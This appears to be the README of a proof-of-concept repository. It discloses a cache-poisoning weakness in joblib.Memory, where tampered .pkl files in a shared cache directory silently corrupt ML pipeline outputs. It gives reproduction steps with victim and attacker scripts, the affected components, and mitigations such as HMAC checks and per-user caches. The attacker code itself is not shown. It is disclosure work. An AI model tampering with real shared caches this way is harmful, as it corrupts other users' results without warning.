Joblib Cache Poisoning Proof-of-Concept

Overview

This repository demonstrates a security vulnerability in joblib.Memory where cached ML artifacts can be silently modified due to lack of integrity verification.

The issue allows an attacker with write access to a shared cache directory to tamper with serialized .pkl artifacts, resulting in corrupted outputs during model execution.

Vulnerability Summary

Type: ML Cache Integrity Bypass / Deserialization Trust Issue
Library: joblib (Memory caching system)
Impact: Silent corruption of ML pipeline outputs
Root Cause: No integrity validation on cached pickle artifacts

Attack Scenario

In shared or multi-tenant environments:

joblib caches function outputs as .pkl files
Cache files are stored in deterministic filesystem paths
Attacker modifies cached artifacts directly
Victim re-executes function and receives corrupted output

Repository Structure


joblib-cache-poc/
│
├── poc/
│   ├── victim.py        # normal ML pipeline using joblib.Memory
│   ├── attacker.py      # cache poisoning script
│
├── shared_cache/        # generated cache directory (optional)
│
├── Report.md            # full vulnerability analysis
└── README.md

Reproduction Steps

1. Run victim pipeline

python poc/victim.py

Expected output:

[1. 2. 3.]

2. Run attacker cache poisoning

python poc/attacker.py

This modifies cached .pkl artifact in shared cache directory.

3. Re-run victim pipeline

python poc/victim.py

Observed output:

['CORRUPTED_FEATURE_VECTOR', [999, 999, 999]]

Security Impact

Silent corruption of ML outputs
Cross-process cache contamination
Broken trust boundary between filesystem and ML execution
No runtime error or warning generated

Affected Component

joblib.Memory
joblib.numpy_pickle._unpickle
joblib.store_backend.load_item
Python pickle deserialization layer

Mitigation

Add cryptographic integrity checks (HMAC/signatures) for cache artifacts
Isolate cache per user/process
Avoid shared writable cache directories
Replace raw pickle usage in shared environments

Author

Nguyen Duc Canh (canhnguyen26)

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support